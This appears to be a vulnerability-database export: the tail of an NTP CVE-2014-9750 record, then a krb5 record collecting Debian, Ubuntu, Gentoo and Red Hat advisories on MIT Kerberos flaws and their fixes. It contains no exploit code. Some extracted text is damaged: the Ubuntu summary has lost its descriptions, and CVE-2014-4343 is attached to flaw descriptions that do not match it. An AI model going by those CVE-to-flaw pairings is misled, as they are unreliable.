"http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9750" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/support/accessrestrictions#section_6.5.2" }, { "trust": 0.8, "url": "http://www.ntp.org/downloads.html" }, { "trust": 0.8, "url": "http://www.ntp.org/ntpfaq/ntp-s-algo-crypt.htm" }, { "trust": 0.8, "url": "http://googleprojectzero.blogspot.com/2015/01/finding-and-exploiting-ntpd.html" }, { "trust": 0.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01" }, { "trust": 0.8, "url": "https://support.apple.com/en-us/ht6601" }, { "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141222-ntpd" }, { "trust": 0.8, "url": "https://support.f5.com/kb/en-us/solutions/public/15000/900/sol15936.html" }, { "trust": 0.8, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15:07.ntp.asc" }, { "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2014-2024.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu96605606/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9750" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10663\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04554677" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1022814" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098944" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1005137" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966675" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967791" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972266" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21974652" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699578" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp4_advisory.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022657" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097484" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966274" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962463" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020857" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903233" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975967" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9750" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-9750" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9751" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3405" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:2231" }, { "trust": 0.1, "url": "https://www.debian.org/security/./dsa-3154" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9297" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3405" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9297" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2015-2231.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-1799" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9298" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9751" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-1798" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1799" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1798" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9298" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5219" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5300" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5194" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5146" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5195" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7704" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7705" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7848" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7705" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7848" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7701" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7691" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5196" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7849" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7850" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7849" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7854" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7852" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7855" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7853" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7854" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7702" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7692" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7871" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7851" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7851" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5196" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7853" } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "VULMON", "id": "CVE-2014-9750" }, { "db": "BID", "id": "72583" }, { "db": "JVNDB", "id": "JVNDB-2014-008138" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "NVD", "id": "CVE-2014-9750" }, { "db": "CNNVD", "id": "CNNVD-201510-026" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "VULMON", "id": "CVE-2014-9750" }, { "db": "BID", "id": "72583" }, { "db": "JVNDB", "id": "JVNDB-2014-008138" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "NVD", "id": "CVE-2014-9750" }, { "db": "CNNVD", "id": "CNNVD-201510-026" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-19T00:00:00", "db": "CERT/CC", "id": "VU#852879" }, { "date": "2015-10-06T00:00:00", "db": "VULMON", "id": "CVE-2014-9750" }, { "date": "2015-02-04T00:00:00", "db": "BID", "id": "72583" }, { "date": "2015-10-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-008138" }, { "date": "2015-11-20T00:42:01", "db": "PACKETSTORM", "id": "134448" }, { "date": "2015-11-02T16:48:39", "db": "PACKETSTORM", "id": "134162" }, { "date": "2015-10-30T23:22:57", "db": "PACKETSTORM", "id": "134137" }, { "date": "2015-10-06T01:59:00.283000", "db": "NVD", "id": "CVE-2014-9750" }, { "date": "2015-10-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201510-026" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-10-27T00:00:00", "db": "CERT/CC", "id": "VU#852879" }, { "date": "2020-06-18T00:00:00", "db": "VULMON", "id": "CVE-2014-9750" }, { "date": "2016-07-11T20:00:00", "db": "BID", "id": "72583" }, { "date": "2016-11-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-008138" }, { "date": "2020-06-18T16:38:06.287000", "db": "NVD", "id": "CVE-2014-9750" }, { "date": "2020-06-19T00:00:00", "db": "CNNVD", "id": "CNNVD-201510-026" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201510-026" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated)", "sources": [ { "db": "CERT/CC", "id": "VU#852879" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201510-026" } ], "trust": 0.6 } }
var-201408-0298
Vulnerability from variot
Double free vulnerability in the init_ctx_reselect function in the SPNEGO initiator in lib/gssapi/spnego/spnego_mech.c in MIT Kerberos 5 (aka krb5) 1.10.x through 1.12.x before 1.12.2 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via network traffic that appears to come from an intended acceptor, but specifies a security mechanism different from the one proposed by the initiator. MIT Kerberos 5 is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause a program to crash, resulting in denial-of-service conditions. Versions prior to Kerberos 5 1.12.2 are vulnerable.
CVE-2014-4343
An unauthenticated remote attacker with the ability to spoof packets
appearing to be from a GSSAPI acceptor can cause a double-free
condition in GSSAPI initiators (clients) which are using the SPNEGO
mechanism, by returning a different underlying mechanism than was
proposed by the initiator.
CVE-2014-4344
An unauthenticated or partially authenticated remote attacker can
cause a NULL dereference and application crash during a SPNEGO
negotiation by sending an empty token as the second or later context
token from initiator to acceptor.
For the stable distribution (wheezy), these problems have been fixed in version 1.10.1+dfsg-5+deb7u2.
For the unstable distribution (sid), these problems have been fixed in version 1.12.1+dfsg-7. ========================================================================== Ubuntu Security Notice USN-2310-1 August 11, 2014
krb5 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Kerberos. This issue only affected Ubuntu 12.04 LTS. This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. (CVE-2014-4344)
Tomas Kuthan and Greg Hudson discovered that the Kerberos kadmind daemon incorrectly handled buffers when used with the LDAP backend. (CVE-2014-4345)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: krb5-admin-server 1.12+dfsg-2ubuntu4.2 krb5-kdc 1.12+dfsg-2ubuntu4.2 krb5-kdc-ldap 1.12+dfsg-2ubuntu4.2 krb5-otp 1.12+dfsg-2ubuntu4.2 krb5-pkinit 1.12+dfsg-2ubuntu4.2 krb5-user 1.12+dfsg-2ubuntu4.2 libgssapi-krb5-2 1.12+dfsg-2ubuntu4.2 libgssrpc4 1.12+dfsg-2ubuntu4.2 libk5crypto3 1.12+dfsg-2ubuntu4.2 libkadm5clnt-mit9 1.12+dfsg-2ubuntu4.2 libkadm5srv-mit9 1.12+dfsg-2ubuntu4.2 libkdb5-7 1.12+dfsg-2ubuntu4.2 libkrad0 1.12+dfsg-2ubuntu4.2 libkrb5-3 1.12+dfsg-2ubuntu4.2 libkrb5support0 1.12+dfsg-2ubuntu4.2
Ubuntu 12.04 LTS: krb5-admin-server 1.10+dfsg~beta1-2ubuntu0.5 krb5-kdc 1.10+dfsg~beta1-2ubuntu0.5 krb5-kdc-ldap 1.10+dfsg~beta1-2ubuntu0.5 krb5-pkinit 1.10+dfsg~beta1-2ubuntu0.5 krb5-user 1.10+dfsg~beta1-2ubuntu0.5 libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.5 libgssrpc4 1.10+dfsg~beta1-2ubuntu0.5 libk5crypto3 1.10+dfsg~beta1-2ubuntu0.5 libkadm5clnt-mit8 1.10+dfsg~beta1-2ubuntu0.5 libkadm5srv-mit8 1.10+dfsg~beta1-2ubuntu0.5 libkdb5-6 1.10+dfsg~beta1-2ubuntu0.5 libkrb5-3 1.10+dfsg~beta1-2ubuntu0.5 libkrb5support0 1.10+dfsg~beta1-2ubuntu0.5
Ubuntu 10.04 LTS: krb5-admin-server 1.8.1+dfsg-2ubuntu0.13 krb5-kdc 1.8.1+dfsg-2ubuntu0.13 krb5-kdc-ldap 1.8.1+dfsg-2ubuntu0.13 krb5-pkinit 1.8.1+dfsg-2ubuntu0.13 krb5-user 1.8.1+dfsg-2ubuntu0.13 libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.13 libgssrpc4 1.8.1+dfsg-2ubuntu0.13 libk5crypto3 1.8.1+dfsg-2ubuntu0.13 libkadm5clnt-mit7 1.8.1+dfsg-2ubuntu0.13 libkadm5srv-mit7 1.8.1+dfsg-2ubuntu0.13 libkdb5-4 1.8.1+dfsg-2ubuntu0.13 libkrb5-3 1.8.1+dfsg-2ubuntu0.13 libkrb5support0 1.8.1+dfsg-2ubuntu0.13
In general, a standard system update will make all the necessary changes.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-crypt/mit-krb5 < 1.13 >= 1.13
Description
Multiple vulnerabilities have been discovered in MIT Kerberos 5. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All MIT Kerberos 5 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=app-crypt/mit-krb5-1.13"
References
[ 1 ] CVE-2014-4341 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4341 [ 2 ] CVE-2014-4343 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4343 [ 3 ] CVE-2014-4345 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4345 [ 4 ] CVE-2014-5351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5351
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-53.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: krb5 security, bug fix and enhancement update Advisory ID: RHSA-2015:0439-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0439.html Issue date: 2015-03-05 CVE Names: CVE-2014-4341 CVE-2014-4342 CVE-2014-4343 CVE-2014-4344 CVE-2014-4345 CVE-2014-5352 CVE-2014-5353 CVE-2014-9421 CVE-2014-9422 CVE-2014-9423 =====================================================================
- Summary:
Updated krb5 packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
Kerberos is a networked authentication system which allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos KDC.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64
- Description:
A NULL pointer dereference flaw was found in the MIT Kerberos SPNEGO acceptor for continuation tokens. A remote, unauthenticated attacker could use this flaw to crash a GSSAPI-enabled server application. (CVE-2014-4344)
A buffer overflow was found in the KADM5 administration server (kadmind) when it was used with an LDAP back end for the KDC database. A remote, authenticated attacker could potentially use this flaw to execute arbitrary code on the system running kadmind. (CVE-2014-4345)
A use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5 library processed valid context deletion tokens. An attacker able to make an application using the GSS-API library (libgssapi) call the gss_process_context_token() function could use this flaw to crash that application. (CVE-2014-5352)
If kadmind were used with an LDAP back end for the KDC database, a remote, authenticated attacker with the permissions to set the password policy could crash kadmind by attempting to use a named ticket policy object as a password policy for a principal. (CVE-2014-5353)
A double-free flaw was found in the way MIT Kerberos handled invalid External Data Representation (XDR) data. An authenticated user could use this flaw to crash the MIT Kerberos administration server (kadmind), or other applications using Kerberos libraries, using specially crafted XDR packets. (CVE-2014-9421)
It was found that the MIT Kerberos administration server (kadmind) incorrectly accepted certain authentication requests for two-component server principal names. A remote attacker able to acquire a key with a particularly named principal (such as "kad/x") could use this flaw to impersonate any user to kadmind, and perform administrative actions as that user. (CVE-2014-9422)
An information disclosure flaw was found in the way MIT Kerberos RPCSEC_GSS implementation (libgssrpc) handled certain requests. An attacker could send a specially crafted request to an application using libgssrpc to disclose a limited portion of uninitialized memory used by that application. (CVE-2014-9423)
Two buffer over-read flaws were found in the way MIT Kerberos handled certain requests. A remote, unauthenticated attacker able to inject packets into a client or server application's GSSAPI session could use either of these flaws to crash the application. An attacker able to spoof packets to appear as though they are from an GSSAPI acceptor could use this flaw to crash a client application that uses MIT Kerberos. (CVE-2014-4343)
Red Hat would like to thank the MIT Kerberos project for reporting the CVE-2014-5352, CVE-2014-9421, CVE-2014-9422, and CVE-2014-9423 issues. MIT Kerberos project acknowledges Nico Williams for helping with the analysis of CVE-2014-5352.
The krb5 packages have been upgraded to upstream version 1.12, which provides a number of bug fixes and enhancements, including:
-
Added plug-in interfaces for principal-to-username mapping and verifying authorization to user accounts.
-
When communicating with a KDC over a connected TCP or HTTPS socket, the client gives the KDC more time to reply before it transmits the request to another server. (BZ#1049709, BZ#1127995)
This update also fixes multiple bugs, for example:
- The Kerberos client library did not recognize certain exit statuses that the resolver libraries could return when looking up the addresses of servers configured in the /etc/krb5.conf file or locating Kerberos servers using DNS service location. The library could treat non-fatal return codes as fatal errors. Now, the library interprets the specific return codes correctly. (BZ#1084068, BZ#1109102)
In addition, this update adds various enhancements. Among others:
-
Added support for contacting KDCs and kpasswd servers through HTTPS proxies implementing the Kerberos KDC Proxy (KKDCP) protocol. (BZ#1109919)
-
Solution:
All krb5 users are advised to upgrade to these updated packages, which correct these issues and add these enhancements.
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1084068 - ipv6 address handling in krb5.conf 1102837 - Please backport improved GSSAPI mech configuration 1109102 - Kerberos does not handle incorrect Active Directory DNS SRV entries correctly 1109919 - Backport https support into libkrb5 1116180 - CVE-2014-4341 krb5: denial of service flaws when handling padding length longer than the plaintext 1118347 - ksu non-functional, gets invalid argument copying cred cache 1120581 - CVE-2014-4342 krb5: denial of service flaws when handling RFC 1964 tokens 1121789 - CVE-2014-4343: use-after-free crash in SPNEGO 1121876 - CVE-2014-4343 krb5: double-free flaw in SPNEGO initiators 1121877 - CVE-2014-4344 krb5: NULL pointer dereference flaw in SPNEGO acceptor for continuation tokens 1127995 - aggressive kinit timeout causes AS_REQ resent and subsequent OTP auth failure 1128157 - CVE-2014-4345 krb5: buffer overrun in kadmind with LDAP backend (MITKRB5-SA-2014-001) 1166012 - libkadmclnt SONAME change (8 to 9) in krb5 1.12 update 1174543 - CVE-2014-5353 krb5: NULL pointer dereference when using a ticket policy name as a password policy name 1179856 - CVE-2014-5352 krb5: gss_process_context_token() incorrectly frees context (MITKRB5-SA-2015-001) 1179857 - CVE-2014-9421 krb5: kadmind doubly frees partial deserialization results (MITKRB5-SA-2015-001) 1179861 - CVE-2014-9422 krb5: kadmind incorrectly validates server principal name (MITKRB5-SA-2015-001) 1179863 - CVE-2014-9423 krb5: libgssrpc server applications leak uninitialized bytes (MITKRB5-SA-2015-001) 1184629 - kinit loops on principals on unknown error
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
ppc64: krb5-debuginfo-1.12.2-14.el7.ppc.rpm krb5-debuginfo-1.12.2-14.el7.ppc64.rpm krb5-devel-1.12.2-14.el7.ppc.rpm krb5-devel-1.12.2-14.el7.ppc64.rpm krb5-libs-1.12.2-14.el7.ppc.rpm krb5-libs-1.12.2-14.el7.ppc64.rpm krb5-pkinit-1.12.2-14.el7.ppc64.rpm krb5-server-1.12.2-14.el7.ppc64.rpm krb5-server-ldap-1.12.2-14.el7.ppc64.rpm krb5-workstation-1.12.2-14.el7.ppc64.rpm
s390x: krb5-debuginfo-1.12.2-14.el7.s390.rpm krb5-debuginfo-1.12.2-14.el7.s390x.rpm krb5-devel-1.12.2-14.el7.s390.rpm krb5-devel-1.12.2-14.el7.s390x.rpm krb5-libs-1.12.2-14.el7.s390.rpm krb5-libs-1.12.2-14.el7.s390x.rpm krb5-pkinit-1.12.2-14.el7.s390x.rpm krb5-server-1.12.2-14.el7.s390x.rpm krb5-server-ldap-1.12.2-14.el7.s390x.rpm krb5-workstation-1.12.2-14.el7.s390x.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-4341 https://access.redhat.com/security/cve/CVE-2014-4342 https://access.redhat.com/security/cve/CVE-2014-4343 https://access.redhat.com/security/cve/CVE-2014-4344 https://access.redhat.com/security/cve/CVE-2014-4345 https://access.redhat.com/security/cve/CVE-2014-5352 https://access.redhat.com/security/cve/CVE-2014-5353 https://access.redhat.com/security/cve/CVE-2014-9421 https://access.redhat.com/security/cve/CVE-2014-9422 https://access.redhat.com/security/cve/CVE-2014-9423 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFU+GoxXlSAg2UNWIIRAtkZAJ9PYyHLsR1t+YWgqw4jb4XTtX8iuACgkxfi gZD8EL2lSaLXnIQxca8zLTg= =aK0y -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 6) - i386, x86_64
It was found that if a KDC served multiple realms, certain requests could cause the setup_server_realm() function to dereference a NULL pointer. (CVE-2014-4343)
These updated krb5 packages also include several bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the References section, for information on the most significant of these changes
